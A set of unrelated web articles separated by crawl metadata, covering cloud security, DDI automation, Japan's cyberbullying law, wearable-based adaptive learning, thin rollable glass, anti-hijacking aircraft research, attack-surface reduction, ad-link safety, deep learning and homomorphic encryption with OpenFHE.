Actually, a private cloud i.e. most clouds deployed by enterprises, small and large ones alike, can experience downtime as often as public clouds like those offered by Google and Amazon, for example. Private, public and hybrid clouds utilize infrastructure, hardware and software that is similar to the ones used in corporate private networks; therefore, IT specialists face the same problems in a “traditional” and a cloud environment. Over 200,000 Google’s Gmail users saw their email accounts emptied in a day, loosing emails and other documentation they archived for years. However, corporate users could experience the same troubles should a company server crash, deleting data stored in their corporate email accounts. No one is insured against hardware faults and Google later admitted that the mysterious loss of data occurred due to a combination of hardware and software faults.
The human factor should not be underestimated, too.
Government agencies around the world avoid using cloud services offered by corporate providers because of the risks related to data leaks and data protection in the Cloud. Actually, most reputable providers of cloud services apply strict data and software access policies similar to those implemented by government bodies. On the other hand, data leaks within government-run companies and agencies occur more frequently than information leaks originating from corporations. If an American sergeant managed to transfer to Wikileaks thousands of classified government cables stored within the U.S. Army computer networks, one should bet that the same can happen to myriads of files and emails stored in public cloud services. The greatest danger is related to targeted attacks and business espionage, while individual users should beware mostly of identity theft.
Reliability of cloud services is another issue that should be taken into account. A growing number of providers offer cloud services and products while Software-as-a-Service (SaaS) and Platform-as-a-Service (PaaS) are now commonly used to reduce corporate costs. Other enterprises rely on Infrastructure-as-a-Service to run their business but in all these scenarios business depends on external resources to run smoothly their everyday operations.
Thus, reliability of cloud products and services is now a major issue while many IT specialists admit they are not convinced in the reliability of cloud solutions deployed within their respective organizations. For example, an enterprise greatly reduces its software licensing fees and payroll costs by deploying a cloud software platform but such a solution can cost dearly if the PaaS provider does not offer an acceptable reaction time in case of malfunctions and service faults.
Once again, the same troubles can occur in a “traditional” software environment where a platform is not supported in an appropriate manner or a company lacks experienced IT staff. Connection and processing speed is also a concern when the issue in hand is cloud computing but this can be subject to a separate article.
In reality, the Cloud is as secure and safe as is a personal computer connected to a closed corporate network, provided that the network is maintained by well-trained specialists and all available and applicable security and safety measures are implemented. No complete security is available in an interconnected environment where practically all devices and gadgets are able to connect to a sort of network.
Apart from imperfections offered by software and hardware, the human factor is still the main threat to security and safety in the Cloud.
By Kiril Kirilov
Kiril V. Kirilov is a content strategist and writer who is analyzing the intersection of business and IT for nearly two decades. Some of the topics he covers include SaaS, cloud computing, artificial intelligence, machine learning, IT startup funding, autonomous vehicles and all things technology. He is also an author of a book about the future of AI and Big Data in marketing.
|
<urn:uuid:7294d2d3-d5b1-4233-b54c-d950e1a00e26>
|
CC-MAIN-2022-40
|
https://cloudtweaks.com/2011/05/why-the-cloud-is-as-secure-as-your-pc/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00257.warc.gz
|
en
| 0.944761 | 913 | 2.59375 | 3 |
You are convinced of the value of the Infrastructure as Code approach, but you don’t really know how to take best advantage of the code that will be produced. The abstraction layer principle, well known in software architecture, can be applied to infrastructure. This layer hides the complexity of the infrastructure and allows other functional programs to manage infrastructure components through high-level API services.
In the context of building such an abstraction layer with automation capabilities for the infrastructure, the DDI (DNS, DHCP, IPAM) solution should be one of the first to plug into and consume data from. DDI is well known as the central repository for all network-related information, so it can help most network services through automation. DDI offers both the information and the repository to store it, as well as enhancements through metadata. But DDI is also a great automation tool with excellent knowledge of what happens on the IP network. These valuable events can therefore be shared, almost in real time, with all other interested solutions.
DDI in the Abstraction Layer
Starting an automation abstraction layer allows you to think about how to present the infrastructure to consumers via the northbound-exposed set of APIs. Do we really care about what a subnet is, or is it better to think about a network with capabilities and associated with IP addressing? Just take a look at how big public cloud players have built their abstraction layer to get some good ideas on how to proceed.
The DDI solution is “hidden” at the bottom of the layer and will probably not be consumed directly by IT applications. It can be interesting to build a set of generic functions that would be easier to use. This will allow all the infrastructure components plugged on the southbound endpoints of the abstraction layer (e.g. firewall, network device, SD-WAN appliance) to consume IP and core networking functions without having to specifically know the grammar of the DDI solution used. This abstraction can also help in proofing the data and actions performed on the DDI, for example validating that an object created is coherent and present in all the repositories that require it. This decoupling can also provide the ability to add some technical meta-data for better tracking of changes and link back to change management components.
Raising Operational Efficiency
With the IPAM repository as well as DNS and DHCP core services bound to the automation abstraction layer, all components of the infrastructure and all the clients of the layer can take advantage of the data and the automation. You can then plug in the other services by usage priority and always maintain a link towards the IPAM for storing valuable information. Think about the virtual machines correctly stored in the Device Manager, and the VLANs in the VLAN manager, they could then be used by any other component. The result is simplified integration between IT tools, faster code deployment, and an overall improvement in operational efficiency.
Automation Through IT Abstraction Layer
An automation abstraction layer is a good way to simplify operations and interoperability. Within this layer, the role of DDI is key.
|
<urn:uuid:36fbaf80-219b-4c3a-894c-926570703ecc>
|
CC-MAIN-2022-40
|
https://www.efficientip.com/ddi-infrastructure-software-architecture/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00257.warc.gz
|
en
| 0.925849 | 644 | 2.546875 | 3 |
Japan’s government has passed a law making cyberbullying punishable by imprisonment, amid rising public concern over online abuse. Under the amendment to the penal code, offenders convicted of cyberbullying can be jailed for up to one year, or fined about $2,200.
It’s a substantial increase from the current sentences of detention for fewer than 30 days and a fine of up to $75. The bill proved controversial in the country, with opponents arguing it could obstruct free speech and be used to censure those in power. Supporters, however, said tougher legislation was needed to crack down on cyberbullying and online harassment.
Insults, under Japan’s penal code, are defined as publicly demeaning someone’s reputation without reference to specifics, whether that is a fact about them or a specific action. This differs from defamation, which involves specifics. Both defamation and insults are punishable under the law. Lawyers are worried that the revised law gives no definition of what constitutes an insult. For example, under the new law, even calling Japan’s leader an idiot could potentially be classed as an insult.
Advocates of the law cite the death of 22-year-old wrestler and reality TV personality Hana Kimura as a reason it was needed. On the day she died, Kimura shared images of self-harm and hateful comments she’d got on social media. Her death was later ruled a suicide. Three men were investigated for their role in her death. One was fined a small sum, and another paid around $12,000 of damages after a civil suit brought by her family.
After the amendment was approved, Japan’s Justice Ministry was questioned about whether the change was suitable given international efforts to exclude defamation from criminal law and ensure it cannot result in imprisonment, and whether Japan’s efforts to protect online rights might therefore harm its reputation for human rights. The Ministry rejected the possibility of that outcome.
Other countries have taken diverse approaches to containing insulting online speech, with measures that force platforms to take down posts that draw complaints, or that require anonymous trolls to be unmasked.
|
<urn:uuid:11c43b76-a65e-4956-9d1d-09256dc38796>
|
CC-MAIN-2022-40
|
https://malwaredefinition.com/index.php/2022/06/16/cyber-bullying-is-now-a-crime-in-japan-culprits-can-get-up-to-a-year-of-prison-time/it-security-central/admin/?doing_wp_cron=1660184877.8281700611114501953125
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00257.warc.gz
|
en
| 0.967936 | 443 | 2.578125 | 3 |
Wearable technology
Let’s say you are enrolled in a university course in electrical engineering and simultaneously pursuing a distance learning course to become a technician. You want to start working through your course material right away. You put on your wearable fitness tracker, connect it to your tablet, and open the e-learning app. You start with a difficult chapter on resistors connected in series and parallel.
Project overview and goals
Motivation is a major factor in facilitating deep learning processes. It makes learning fun and interesting and, as a result, improves the overall learning process. If motivational problems are detected early, the learning process can be modified and the learning content adapted to the needs of the student.
The goal of the SensoMot research project is to predict critical motivational states using sensor measurements collected by wearable devices. By deriving adaptive mechanisms, the learning process can subsequently be tailored to meet the motivational needs of the student. Based on these objective sensor data (e.g., signals indicating stress or boredom), algorithms in the learning environment will adjust internal variables such as the learning speed and level of difficulty, or propose alternate learning paths.
Prototypes of adaptive learning scenarios for a university course on “Nanotechnology” as well as a distance learning course on “Electrical Engineering” will be implemented in the project. These will be integrated and evaluated on the e-learning and e-testing platform “CBA ItemBuilder”, a product developed by Nagarro for its customer DIPF (German Institute for International Pedagogical Research) that has been in use for many years. The resulting learning systems will thereafter be made available to a broad variety of educational applications.
The innovation around SensoMot will, for the first time ever, make it possible to detect motivational obstacles in the way of learning using non-obtrusive sensors and to adapt learning content accordingly. Learning motivation increased in this manner could lead to greater learning success and lower dropout rates in a wide range of technology-based learning situations.
We are facing three major challenges:
- Can we find wearable devices that provide the “right” sensor data in streaming mode, so that motivation levels can be deduced? This is not a given, as many commercial wearable devices do not provide open interfaces or access to raw data. Typically, heart rate, skin resistance, eye tracking and mouse/keyboard movement are used in similar research projects.
- Can we apply adequate pattern recognition and machine learning techniques to infer motivation levels from raw sensor data? The intended process chain is depicted in the diagram below, which shows consolidation of different sensor data via pattern recognition and machine learning to identify motivation indicators and dynamically adapt the learning content accordingly.
- Can we ensure that this sensitive data is secure enough to build the necessary trust so that students are willing to use such a system in their e-learning process?
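To make the second challenge concrete, here is a deliberately simplified Python sketch of such a processing chain: windowed sensor samples are reduced to summary features and mapped to a coarse motivation label. All feature names, thresholds, and the decision rule are invented for illustration and are not part of the SensoMot design, which would use trained machine learning models instead of hand-set rules.

```python
# Illustrative sketch: deriving a motivation indicator from one window of
# streamed wearable-sensor samples. Thresholds are invented for demonstration.

def extract_features(window):
    """Summarize one window of raw samples (heart rate, skin resistance)."""
    hr = [s["heart_rate"] for s in window]
    sr = [s["skin_resistance"] for s in window]
    mean_hr = sum(hr) / len(hr)
    hr_var = sum((x - mean_hr) ** 2 for x in hr) / len(hr)
    mean_sr = sum(sr) / len(sr)
    return {"mean_hr": mean_hr, "hr_var": hr_var, "mean_sr": mean_sr}

def motivation_state(features):
    """Map features to a coarse motivation label (toy decision rule)."""
    if features["mean_hr"] > 95 and features["hr_var"] > 40:
        return "stressed"   # adaptation: lower difficulty, slow down
    if features["mean_hr"] < 65 and features["hr_var"] < 5:
        return "bored"      # adaptation: raise difficulty, switch content
    return "engaged"        # adaptation: keep current learning path

window = [{"heart_rate": 60 + (i % 3), "skin_resistance": 410} for i in range(30)]
print(motivation_state(extract_features(window)))  # low, flat heart rate -> "bored"
```

A real system would replace the decision rule with a classifier trained on labeled sensor data, but the overall flow of consolidating raw streams into motivation indicators that drive content adaptation is the same.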
The result of this research could be a milestone in building adaptive learning environments and making learning processes more efficient, particularly in the context of lifelong learning. Even beyond education, the ability to detect motivation levels could be envisaged for many other applications, e.g. to assess the quality of childcare or aged care work.
Project consortium partners
Nagarro GmbH - Munich, leading the consortium, will provide the integration of sensor data collection into the “CBA ItemBuilder” platform and develop the basic mechanisms for adapting the learning content at runtime.
The German Institute for International Educational Research (Deutsches Institut für Internationale Pädagogische Forschung) - DIPF is responsible for the scientific project co-ordination.
The distance learning institute “Fernlehrinstitut Dr. Robert Eckert GmbH” (Eckert) is the second commercial consortium member besides Nagarro and will provide the test bed and validation for a distance learning course on “Mechanical Engineering”. It is the natural first user of such a technology.
The “Technical University of Ilmenau”
The Medical School Hamburg (MSH) will bring in its research competence for the theoretical and empirical identification of motivation indicators and the derivation of adaption algorithms.
The Leuphana University Lüneburg (Leuphana) will provide the machine learning technology to deduce motivation levels from the raw sensor data.
You can’t see it, so you probably take it for granted. But think for a moment about all the glass that you use in everyday life. From windows to windshields, light bulbs to flat panel screens, these variations of melted sand are a fundamental part of many technologies. One of the key applications is for LCD panels, which require glass that is especially smooth and uniform in thickness. Corning is the market leader in LCD glass, with Asahi Glass Company (AGC) providing a significant portion as well. Glass also works well at blocking air and water vapor, which is necessary for encapsulating OLED displays.
At present, LCD and OLED panels are made in “batch mode” production. This means that the glass substrates are cut into rectangles for processing, then cut into individual panels. In general, larger substrates translate into more efficient production, especially for large displays (though there are indications that we may be nearing some of the limits for those efficiencies). The dream is to be able to produce displays on long ribbons of glass that move continuously through the different production steps, much like a newspaper is printed on a giant printing press using rolls of paper. Roll-to-roll processing could be much more efficient than batch processing. Among the many problems, one stands out: have you ever tried to roll up a sheet of glass?
Corning and AGC have both managed this trick, as shown in this photo. At SID 2011, both companies demonstrated glass that is just 0.1 mm thick and can be rolled up. How thick is 0.1 mm? It’s about the same thickness as a sheet of paper. Managing this material is tricky, as you might imagine. The Corning demo showed a loop of glass traveling over a series of three rollers, and plastic film was attached to the edges on both sides of the glass to protect the edges from damage as it rolled around.
Still, the advantages of this thin glass are plenty. Even if you don’t use roll-to-roll production, the glass is thinner and much lighter than standard LCD glass (which is typically 0.7 mm thick, or about the thickness of a credit card). While you can’t wrap it around a pen, it does make it possible to create more flexible displays, which could lead to novel applications. The big bet, however, is that this could help lower production costs even further, and help meet the consumer’s continued expectations of larger displays for less money.
In May, the White House introduced an Executive Order to improve the nation’s cybersecurity. Cybersecurity attacks against SolarWinds, Microsoft, and Colonial Pipeline are reminders that we face increasingly sophisticated malicious adversaries. Insufficient cybersecurity defenses have made us more vulnerable to incidents.
“It is the policy of my Administration that the prevention, detection, assessment, and remediation of cyber incidents is a top priority and essential to national and economic security. The Federal Government must lead by example. All Federal Information Systems should meet or exceed the standards and requirements for cybersecurity set forth in and issued pursuant to this order,” said President Joe Biden.
Major highlights and directives from the executive order:
- Remove Barriers to Threat Information Sharing Between Government and the Private Sector.
- Modernize and Implement Stronger Cybersecurity Standards in the Federal Government.
- Improve Software Supply Chain Security.
- Establish a Cybersecurity Safety Review Board.
- Create a Standard Playbook for Responding to Cyber Incidents.
- Improve Detection of Cybersecurity Incidents on Federal Government Networks.
- Improve Investigative and Remediation Capabilities.
The frequency of ransomware attacks has increased dramatically over the past year: according to Computer Weekly, 93% more ransomware attacks were carried out in the first half of 2021 than in the same period the year before. Attacks have also increased significantly since the pandemic forced a global shift to remote work and, with it, an expansion of the attack surface of most organizations.
While the Executive Order has highlighted areas for improvement in U.S. cybersecurity, given the continued rise in ransomware attacks, one of the biggest actions an organization can take to improve its security posture is to reduce its attack surface.
What is an attack surface?
An attack surface is the sum of all the points through which threat actors can infiltrate your digital network. The smaller the attack surface, the fewer attack vectors – or entry points – there are for a threat actor to gain access to or attack your system. The bigger the attack surface, the more entry points.
What are the types of attack surface?
There are three main types of attack surface:
- Digital or external attack surface: The digital attack surface, also known as the external attack surface, is where threat actors or unauthorized users can exploit and/or compromise digital systems.
- Physical attack surface: Physical points of compromise, such as carelessly discarded hardware that might contain user data or login credentials, handwritten passwords, and physical break-ins.
- Social engineering attack surface: Malicious activities accomplished through human interactions, such as phishing, baiting, pretexting, spear phishing, etc.
All of these are important, but with increasing digital modernization and transformation efforts across enterprises, an organization’s digital attack surface is critical when it comes to a strong cybersecurity posture.
For example, a cyber criminal can penetrate your network to obtain private company information from the following points:
- Connected Systems & Software
- Out-of-Date Security Certificates
- Compromised Credentials
- Weak or Stolen Passwords
According to TechTarget, “There was an intense spike in the number of cyberattacks such as phishing and malware exploiting the fragility and inadequacy of the infrastructure that could support remote working, as is indicated by the U.S. federal report. Not only did the attack surface expand, but several new ones also came into play as corporate IT assets extended into home networks.”
Combining the “Inside-Out” and “Outside-in” Views for Complete Visibility
The lack of visibility into one’s infrastructure remains a fundamental cybersecurity challenge, and the extension of corporate assets into home networks has only complicated this. But often, organizations have taken an “inside-out” approach to cybersecurity.
This approach has been a foundation for cybersecurity practitioners: set up a perimeter and protect what is inside your network. Set up firewalls to stop certain traffic from flowing in and out. Implement anti-virus on endpoints so you can ensure the outer edges of your network have some ability to identify and quarantine bad or suspicious things. It’s the castle and moat approach.
What has been less adopted but is as critical to reducing one’s attack surface is understanding the “outside-in” approach to your networks: your external attack surface. According to Gartner’s Hype Cycle for Security Operations – 2021, “External Attack Surface Management (EASM), autonomous security testing, and threat intelligence services all provide an inward-looking viewpoint toward an organization’s infrastructure from the outside. This renewed approach to looking at exposure provides better enrichment for organizations to decide what really matters to them — without having to look at the threat landscape in a more general way and wonder if they are affected.”
This doesn’t mean you should give up on the “inside-out” view – only that this view of your attack surface needs to provide broader insight into assets and interfaces on your network. In addition to EASM, another area of interest in the Gartner Hype Cycle for Security Operations – 2021 report is Cyber Asset Attack Surface Management (CAASM). “CAASM is an emerging technology focused on enabling security teams to solve persistent asset visibility and vulnerability challenges.” It expands focus on a subset of assets such as endpoints, servers, devices, or applications. It also helps remediate gaps caused by manual processes and homegrown systems. With CAASM, an organization gains full visibility into all organizational assets to better understand its attack surface and any existing security control gaps.
When organizations only look at the internal view, they are playing defense. With an “outside-in” approach, you can proactively mitigate cyber risk and prioritize defensive actions. Only with both can you strategically defend critical systems and data with a risk-based strategy.
How to reduce your attack surface
The smaller the attack surface, the fewer entry points cyber criminals have to penetrate your network. Here are a handful of tactics you can use to reduce your attack surface:
- Assume zero trust. Don’t automatically trust anything inside or outside your network perimeters. Verify everything trying to connect to your systems before granting access.
- Create strong access protocols and use strong authentication policies. Strong protocols and policies can help protect your network.
- Promote the use of a password manager. Set strong and unique passwords across different employee accounts.
- Backup often and protect your backups. You should assume that your network will be breached, so make sure that you have properly stored and protected backups.
- Strengthen your firewalls and segment your network. Firewalls help defend against many cyberattacks, and segmentation limits how far an intruder can move once inside.
- Ensure email security. Keep employees trained to look for suspicious requests, attachments, links, and phishing activities.
- Monitor third-party data breaches. According to a report by the Ponemon Institute, 51% of businesses have suffered a data breach caused by a third party.
- Monitor for data leaks. Monitor for company data leaks. The faster you know about a potential breach, the quicker you can mitigate the situation.
- Remove unnecessary software and services. The more software connecting to your network – the bigger your attack surface.
- Invest in cybersecurity awareness training. Keep your employees up to date on cybersecurity training and tactics. Employees and contractors are a significant cause of data breaches.
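Several of these tactics (removing unnecessary software, monitoring what is exposed) boil down to comparing what should be running against what actually is. The sketch below illustrates that inventory idea with plain Python sets; the host and service names are invented, and a real CAASM or EASM tool would populate these lists from discovery scans rather than hard-coded data.

```python
# Toy attack-surface inventory check: anything discovered on the network
# but absent from the approved inventory is a candidate for removal.
approved = {
    "web-01": {"nginx", "sshd"},
    "db-01": {"postgres", "sshd"},
}
discovered = {
    "web-01": {"nginx", "sshd", "redis"},   # redis was never approved
    "db-01": {"postgres", "sshd"},
    "legacy-03": {"ftp"},                   # unknown host entirely
}

def surface_gaps(approved, discovered):
    """Return, per host, the discovered services with no approval record."""
    gaps = {}
    for host, services in discovered.items():
        extra = services - approved.get(host, set())
        if extra:
            gaps[host] = sorted(extra)
    return gaps

print(surface_gaps(approved, discovered))
# {'web-01': ['redis'], 'legacy-03': ['ftp']}
```

Each entry in the result is an unaccounted-for service, i.e., attack surface that can likely be removed.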
LookingGlass’s data, platforms, and enrichment can help your organization quickly understand common attacks, focus your defenses by leveraging tailored datasets, and move you toward a more proactive stance against the most common threats. Find out more by contacting us today to book a demo.
Most of us have probably clicked an ad instead of the link to the original website we were searching for, whether we realize it or not. When we search on Google for a certain topic or request, we expect and rely on the fact that we will find the answer we are looking for quite easily. What if I told you that ad links can be a potential threat to your computer?
Recently, a client of ours searched online for a local grocery store. Believing that the first hyperlink she saw was the store’s own website, she instead clicked an ad that redirected her to a completely different website not linked to the store. The new website began to track the specific items she was interested in, such as food and drink products. This resulted in the customer being served a plethora of ad pop-ups for different grocery items.
What is an advertisement link?
Law Insider states that, “Advertising Links means a hypertext link or other mechanism through which advertising is made available to or accessible by user selection” (Lawinsider).
An example: if you search on Google, the first result you see will most likely be an ad. The link will either redirect you to the marketing page of the website you’re searching for or to an entirely different webpage that can potentially harm your computer.
How do I know if I am clicking an ad link versus the actual result I’m looking for?
Usually when searching for a specific website, you may be tempted to click the first link you see. However, pay attention to the title of the result and whether it is labeled “Ad” at the beginning. If it is, it may not be the website you are looking for.
Also, pay attention to the hyperlink. If it does not consist of the website’s original name, then this also may not be what you are looking for.
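One mechanical way to apply this advice is to compare a link’s host name against the domain you expect before clicking. The sketch below is a simplified illustration (it checks only the host suffix, and real ad redirects can be more elaborate); the grocery-store domain names are invented.

```python
from urllib.parse import urlparse

def looks_like_expected_site(url, expected_domain):
    """True if the URL's host is the expected domain or one of its subdomains."""
    host = urlparse(url).hostname or ""
    return host == expected_domain or host.endswith("." + expected_domain)

print(looks_like_expected_site("https://www.examplegrocer.com/order",
                               "examplegrocer.com"))            # True
print(looks_like_expected_site("https://examplegrocer.tracking-ads.net/x",
                               "examplegrocer.com"))            # False
```

Note how the second URL contains the store’s name but belongs to an entirely different registered domain, which is exactly the pattern many ad redirects use.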
Additionally, even if you may be searching to buy a certain item, these ads still do not give the best results. It is good practice to click on a trusted website rather than an ad.
Here is an example shown below.
So, what are the potential threats in clicking advertising links?
Overall, when surfing the web, pay attention to every link you click. Some ads may redirect you to a malicious website asking you to enter private information. Others may trigger a pop-up prompting you to click a button to “remove detected viruses”, when in reality clicking the button will install them. Avoiding ads reduces your exposure to untrusted websites and the threats they pose to your computer.
Infiniwiz helps companies create more unified business functions, improve customer service, and utilize technology to move forward. Our experienced Chicago IT consulting experts will make your technology work for you and keep you from spending endless, frustrating hours managing your business IT.
- April 26, 2019
- Posted by: admin
- Category: Artificial Intelligence
Over the past few years, technology users have seen technology evolve in leaps and bounds. From speech-recognition functions in our smartphones to machine translation, this technological boom has produced fascinating new features with every passing day; the latest of the lot being image recognition.
Now, one obvious question arises: how are these things made possible?
And that is how we are brought face-to-face with the family of AI techniques called deep learning. In the realm of Artificial Intelligence, deep learning is still referred to by many scientists as ‘deep neural networks’.
How did these neural networks come into being?
It might be surprising, but the concept of neural nets goes back to as early as the 1950s. Most of the key algorithmic discoveries were actually made around the 1980s and 1990s, and they are now harnessed by the computer scientists of this generation.
But the most remarkable aspect of neural nets is that no human being explicitly designs the computer to produce these breakthroughs. Instead, programmers feed the computer countless algorithms, data points, and images so that the machine learns to recognize particular sentences or identify patterns on its own.
What is deep learning?
As mentioned before, deep learning belongs to the vast world of Artificial Intelligence. The intention of AI is to build machines that can engage in problem-solving using deep thinking, as we humans do.
Another subset of AI is Machine Learning, which involves mathematical techniques that help a computer accomplish complex tasks. Within this family of Machine Learning lies the small wonder known as deep learning. The idea behind the deep learning technique is to enable a software application to train itself to complete certain tasks, like speech and image recognition, by exposing multi-layered neural networks to huge volumes of data.
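The layered structure behind these networks can be made concrete with a toy example. The two-layer network below computes XOR with hand-set weights; in real deep learning the weights would be learned from data by gradient descent rather than set by hand, so this is only a structural illustration.

```python
# A minimal two-layer neural network with hand-set weights that computes XOR.
# Real deep learning *learns* such weights from data; fixing them by hand
# just makes the layered structure visible.

def step(x):
    """Threshold activation: fire (1) if the weighted input is positive."""
    return 1 if x > 0 else 0

def neuron(inputs, weights, bias):
    return step(sum(i * w for i, w in zip(inputs, weights)) + bias)

def xor_net(a, b):
    h1 = neuron([a, b], [1, 1], -0.5)       # hidden unit: a OR b
    h2 = neuron([a, b], [1, 1], -1.5)       # hidden unit: a AND b
    return neuron([h1, h2], [1, -1], -0.5)  # output: OR and not AND

for a in (0, 1):
    for b in (0, 1):
        print(a, b, "->", xor_net(a, b))
```

Each hidden unit detects a simple pattern (OR, AND), and the output layer combines them. Hierarchical composition of features like this, repeated across many layers and millions of learned weights, is what deep networks do at scale.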
Interestingly enough, according to AI experts, this technology has the power to transform any industry within a fortnight.
Although computers are definitely becoming more intelligent, it does not mean that the day is already here when super-intelligent machines can do everything by themselves without human intervention. Neural networks merely excel at recognizing patterns, often better than humans. But they lack the capacity for reasoning that we are gifted with. To know more, deep learning tutorials can be found online.
What is the future of deep learning?
Currently, many companies have taken on projects to explore deep learning applications and make the most of them in their field. Some companies are also looking forward to implementing deep learning in their day-to-day operations. Such advanced applications have been commercially used by giants like Google, Facebook, and Amazon, which generate vast amounts of data every second. Most of these companies plan to develop more realistic and helpful automated agents like “bots”, by utilizing deep learning, to enrich their customer services.
Top technological organisations are also incorporating Deep learning to excel in other spheres. For instance, Google launched a project based on deep-learning in 2011 and then started installing neural nets in its speech recognition products from 2012. Currently, the company is running about 1000 deep-learning projects. Also, while Microsoft Corporation started using the technology for its commercial speech-recognition products, it is now working to employ neural networks for photo search, translation system, and search rankings.
The breakthroughs of deep learning technology are not merely confined within the borders of the technology industry only. Deep learning applications are also being extensively used in medical and healthcare organisations, to help them achieve greater accuracy in diagnosis and treatment of patients.
In the wake of a foiled terrorism plot targeting aircraft departing from Great Britain, European researchers are pushing hard to create a non-hijackable plane. The security program could combat on-board threats by 2008.
The non-hijackable plane would feature technology designed to serve as a last barrier to attacks on planes in flight. The vessel would include computer systems designed to spot suspicious passenger behavior and a collision avoidance system that would adjust the plane’s trajectory to prevent it from being diverted from its course.
The researchers are also attempting to develop an on-board computer that could act as an automatic pilot, directing the plane to the nearest airport even in the midst of a hijack. That feature, though, could be 15 years off.
SAFEE and Sound
The four-year, 35.8 million euro (US$49 million) non-hijackable plane project is called SAFEE, or Security on Aircraft in the Future European Environment. It was launched in 2004 and includes partners such as Airbus, BAE Systems and Siemens.
Initiatives include an on-board threat detection system based on processing multiple sensor information, a threat assessment and response management system and decision support tool, flight reconfiguration and a study of an automatic guidance system to control the aircraft.
SAFEE initiatives also include a data protection system securing all the data exchanges in and out of the aircraft, security evaluation systems, legal and regulatory issues threat assessment, operational concept development, validation approach, economic analysis and training.
The SAFEE system could be commercially available as soon as 2010, but some security experts are skeptical.
An Unsinkable Ship
“The Titanic was billed as the ship that was unsinkable. Now we know that there is no ship in this world that is unsinkable, no plane that is non-hijackable and no marriage that is undivorceable,” Dr. Britt Marshall, a former law enforcement officer and INTERPOL agent, told TechNewsWorld.
“If a hijacker gets on board the plane, he can merely kick open a door and everybody inside would be dead in a matter of minutes,” he continued.
Marshall stands by the recommendation he made to the government back in 1978: move airports away from major metropolitan areas.
Washington National, Midway and LaGuardia airports, he said, are in the heart of their cities, and there is no time to recover if hijackers decide to crash a plane into the Pentagon, White House or Empire State Building. “Hijackers are ideologues. If someone wants to do something bad, they will find a way to do it,” Marshall said. “So I don’t believe there will be a non-hijackable plane, but this is a good project nonetheless.”
Adventures in Making Arbitrary Computation with Fully Homomorphic Encryption a Practical Reality
Encrypted Computation: Who, What, How and Why?
A core privacy preserving technology for computing on data while it is encrypted is Homomorphic Encryption (HE). This is a form of encryption that allows users to share their sensitive data in encrypted form, perform computation on the data (for example, within the cloud on an insecure system) without ever decrypting it, and finally decrypt and distribute the computation results to only selected participants. OpenFHE is the next generation open-source library for building systems based on homomorphic encryption. Duality uses OpenFHE as the core cryptography library for its privacy preserving data collaboration platform. Users of the Duality platform can perform various forms of analysis (database queries, statistics, training of machine learning models) on sensitive data that would not otherwise be made available for shared processing due to various legal limitations (such as being held in different countries, each with its own data privacy laws). Encrypting the data and processing it while encrypted allows the information to cross borders and be processed in the cloud (even on insecure systems) while satisfying all the various privacy laws simultaneously. This ability comes at a cost, though: computation on, and storage of, homomorphically encrypted data is typically at least an order of magnitude larger than computation or storage in the clear.
The Alphabet Soup of Encryption Schemes
HE is implemented as one of several co-existing “schemes”, all labeled with the initials of the researchers that first published the approach. One fundamental restriction that currently exists, is that in all HE schemes, one needs to identify the base data type to use for all math. We’ll do a quick summary of the schemes supported in OpenFHE based on the underlying data types supported.
Exact integer data:

The Brakerski-Gentry-Vaikuntanathan (BGV) and Brakerski/Fan-Vercauteren (BFV) schemes use modulo integer encoding, where all plaintext numbers are limited to the range of unsigned numbers [0 .. q-1] or signed numbers [-q/2 .. q/2-1], where q is an integer chosen sufficiently large by the user so that all operations in their application are performed without having any intermediate value or final output exceed the bounds of the above range.
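The wrap-around risk this range implies can be seen with plain, unencrypted modular arithmetic. In the sketch below, the toy modulus and operand values are invented for illustration; real BGV/BFV parameters are far larger.

```python
# Toy demonstration of why q must be chosen with the whole computation in
# mind: a product that exceeds q silently wraps around.
q = 2**16  # toy plaintext modulus; real applications pick q much larger

def to_signed(x, q):
    """Map a residue in [0, q-1] to the signed range [-q/2, q/2 - 1]."""
    return x - q if x >= q // 2 else x

a, b = 300, 250
product = (a * b) % q   # true value 75000, but 75000 mod 65536 = 9464
print(product)          # 9464 -- the result wrapped and is now wrong
print(to_signed(q - 1, q))  # -1: the top residue decodes as a negative number
```

Because the scheme only ever sees residues mod q, there is no overflow error to catch; the wrong answer simply decrypts cleanly, which is why the user must bound every intermediate value in advance.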
Approximate floating-point data:
The Cheon-Kim-Kim-Song (CKKS) scheme maps floating-point data to an approximate representation that is not bounded in range but is restricted in accuracy (number of bits of accuracy).
Boolean data:

TFHE and FHEW are two similar schemes where encrypted data is typically a single bit (or, as a new feature in OpenFHE, a very small integer). We collectively call these schemes BinFHE (short for “Binary FHE”) in OpenFHE. Whereas BGV, BFV and CKKS all allow us to encrypt a vector of data into a single ciphertext, TFHE/FHEW deals with single-bit ciphertexts.
What’s the Vector Victor?
BGV, BFV and CKKS are all vectorized schemes, meaning that they allow us to encrypt an entire vector of data into a single ciphertext, and perform math operations on these encrypted vectors with one function call. The operations include vector addition, element wise (Hadamard) vector multiplication, and rotation of the vector (i.e., circular shifting the entries of the vector). In general, the encrypted vector is of a length that is typically a power of two related to the parameters used when the scheme is set up. Arbitrary-length vectors are zero padded before encryption.
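In plaintext terms, the three primitive operations behave as in the sketch below. OpenFHE applies the same arithmetic slot-wise to encrypted vectors, so this shows only the math, not the encryption.

```python
# Plaintext analogues of the three primitive SIMD operations offered by the
# vectorized HE schemes: addition, Hadamard product, and circular rotation.

def vec_add(a, b):
    return [x + y for x, y in zip(a, b)]

def vec_mult(a, b):          # element-wise (Hadamard) product
    return [x * y for x, y in zip(a, b)]

def vec_rotate(a, k):        # circular left shift by k slots
    return a[k:] + a[:k]

a = [1, 2, 3, 4]
b = [10, 20, 30, 40]
print(vec_add(a, b))     # [11, 22, 33, 44]
print(vec_mult(a, b))    # [10, 40, 90, 160]
print(vec_rotate(a, 1))  # [2, 3, 4, 1]
```

Anything else (inner products, sums across slots, matrix products) must be composed from these three primitives, which is why rotation is as fundamental as the arithmetic operations.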
